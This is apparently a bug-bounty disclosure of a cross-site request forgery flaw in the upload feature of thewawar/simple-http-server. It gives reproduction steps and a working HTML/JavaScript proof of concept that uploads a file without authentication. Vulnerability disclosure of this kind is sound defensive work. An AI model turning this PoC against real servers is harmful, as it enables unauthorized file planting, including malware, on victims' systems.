We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in thewawar/simple-http-server

Valid

Reported on

Mar 27th 2021

✍️ Description

The 'upload' feature in simple-http-server is vulnerable to cross-site request forgery, it doesn't authenticate the user and just uploads the files which are given to it. If upload feature is enabled, it can allow attackers to craft web pages and if victims interact with attackers' web pages then a cross-site request can be sent to the website by simple-http-server and a file can be uploaded on behalf of the victim.

🕵️‍♂️ Proof of Concept

  1. Start a web server with --upload as an argument which enables uploading functionality.
  2. Save the following PoC.html and open it in a browser.
  3. Click on "Submit Request".
  4. Observe that a file was uploaded, you can check the web root and see the newly uploaded file.

In this process, authentication wasn't required and with minimal user interaction a file can be uploaded on behalf of victim.

<!-- PoC.html -->

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost:8000\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------355111547139502215671973431497");
        xhr.withCredentials = true;
        var body = "-----------------------------355111547139502215671973431497\r\n" + 
          "Content-Disposition: form-data; name=\"files\"; filename=\"file.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "hello pwned\r\n\r\n" + 
          "-----------------------------355111547139502215671973431497--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of allowing an attacker to send requests on behalf of other users and uploading files from their browsers. This can be used to plant malware and other malicious files inside the web server.

Occurrences

to join this conversation